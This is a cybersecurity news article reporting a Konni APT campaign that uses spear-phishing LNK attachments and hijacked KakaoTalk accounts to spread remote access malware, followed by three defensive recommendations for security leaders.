Search

Konni APT Hijacks KakaoTalk Accounts to Spread Malware

Cyber threats and incidents
By John Kevin Hao
Credit: Microsoft Store

Related

Cyber threats and incidents

Hackers Use GoogleErrorReport Scheduled Task for Persistence in Dropping Elephant Campaign

What happened The threat actor known as Dropping Elephant has...
Read more
Cyber threats and incidents

CryptoBandits Malware Doubles as Backdoor and Abuses Tor

What happened Microsoft warned about CryptoBandits, a Windows-based cryptocurrency clipper...
Read more
Cyber threats and incidents

Microsoft Disrupts Fox Tempest Malware-Signing-as-a-Service Platform Tied to Ransomware Gangs

What happened Microsoft unsealed a legal case in US District...
Read more
Cyber threats and incidents

TrickMo Android Banker Adopts TON Blockchain for Covert Command-and-Control

What happened ThreatFabric has identified a new variant of the...
Read more
Cyber threats and incidents

JDownloader Website Hacked to Replace Installers With Python RAT Malware

What happened The official JDownloader website was compromised between May...
Read more

Share

What happened

Researchers uncovered a cyber-espionage campaign linked to the Konni APT group that begins with targeted spear-phishing emails and ultimately hijacks victims’ KakaoTalk messaging accounts to spread malware to additional targets. The emails impersonate official notices appointing recipients as lecturers on North Korean human rights issues, encouraging them to open an attached archive containing a malicious LNK shortcut file disguised as a document. When executed, the file launches a hidden PowerShell script that connects to a command-and-control server and downloads additional malware. After establishing access, attackers remain on the compromised system collecting documents and account information before using the victim’s KakaoTalk PC application to send malicious files to contacts, expanding the campaign through trusted relationships. The attack chain deploys multiple remote access tools including EndRAT, RftRAT, and RemcosRAT, delivered through AutoIt-based scripts. 

Who is affected

Individuals and organizations targeted with the spear-phishing emails and using KakaoTalk messaging are affected, particularly those whose compromised accounts were used to distribute malicious files to contacts. 

Why CISOs should care

The campaign demonstrates how threat actors combine phishing, long-term system access, and hijacked messaging accounts to spread malware through trusted communication channels, making secondary infections harder for victims to detect. 

3 practical actions

  1. Inspect suspicious LNK files in email attachments. Malicious shortcut files can silently launch scripts that download malware. 
  2. Monitor messaging platforms for abnormal file sharing. Compromised KakaoTalk accounts were used to distribute malware to trusted contacts. 
  3. Detect persistence mechanisms on compromised systems. The attackers created scheduled tasks that run frequently to maintain long-term access. 

For more reporting on threats involving credential-stealing malware, explore our latest coverage under the Malware tag.

IMG 0514 2
+ posts

John Kevin Hao is a news and feature writer covering cybersecurity, technology, and business targeted for professional audiences.

Previous article
New ACRStealer Variant Uses Syscall Evasion to Avoid Security Detection
Next article
Android 17 Introduces Advanced Protection Mode to Block Malicious Service Abuse
AI and security

Malicious AI Skill Bypasses Security Scans, Reaches 26,000+ AI Agents

What happened A controlled security experiment has revealed a significant...
AI and security

Claude Fable 5 Builds Windows-Compatible Rust Kernel in Minutes

What happened Anthropic’s Claude Fable 5 has demonstrated a new...

Subscribe to our stories

To be updated with all the latest news, offers and special announcements.